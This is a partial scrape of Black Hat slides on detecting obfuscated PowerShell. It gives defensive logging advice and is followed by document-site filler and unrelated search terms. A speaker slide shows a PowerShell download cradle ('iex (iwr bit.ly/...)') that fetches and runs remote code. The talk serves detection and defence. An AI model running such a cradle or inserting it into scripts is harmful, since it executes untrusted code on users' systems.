Revoke-Obfuscation - Black Hat Briefings
Revoke-Obfuscation
> PowerShell Obfuscation Detection Using Science
Daniel Bohannon - @danielhbohannon
Lee Holmes - @Lee_Holmes
0.0/00
> Whois
-
MANDIANT Senior Applied Security Researcher
Invoke-Obfuscation, Invoke-CradleCrafter
Obfuscation, evasion and detection techniques
@danielhbohannon
%ProgramData:~0,1%%ProgramData:~9,2% /c echo OBFUSCATION_FTW!
Title . @Speaker . Location
0.0/00
> Whois
-
Lead security architect of Azure Management @ MS
Author of the Windows PowerShell Cookbook
Original member of PowerShell Development Team
@Lee_Holmes
iex (iwr bit.ly/e0Mw9w)
Title . @Speaker . Location
0.0/00
Title . @Speaker . Location
0.0/00
Preparing Your Environment for Investigations
? Logs (and retention) are your friend ? 1) enable 2) centralize 3) LOOK/MONITOR
? Process Auditing AND Command Line Process Auditing ? 4688 FTW!
?
? SysInternals¡¯ Sysmon is also a solid option
? Real-time Process Monitoring
? Uproot IDS -
? PowerShell Module, ScriptBlock, and Transcription logging
?
?
................
................
In order to avoid copyright disputes, this page is only a partial summary.
To fulfill the demand for quickly locating and searching documents.
It is intelligent file search solution for home and business.
Related download
- a hunting story recorded future
- the complete guide to quoting in powershell redgate
- there s something about wmi fireeye
- powershell security defending the enterprise from the latest attack
- powershell toolkit apt35 exploits log4j vulnerability to distribute new
- revoke obfuscation black hat briefings
- powershell obfuscation detection using science black hat
- dell storage center command set 7 1 for windows powershell
- windows 10 powershell commands pdf
- fileless malware execution with powershell is easier than you may
Related searches
- new york hat cap
- pull names out of a hat online
- red hat linux command list
- red hat linux command reference
- red hat linux commands pdf
- red hat linux 7 commands
- red hat linux 7 download
- ww2 german hat insignia
- ww2 military hat insignias
- us army hat insignia
- revoke ach authorization form
- army retirement briefings 2020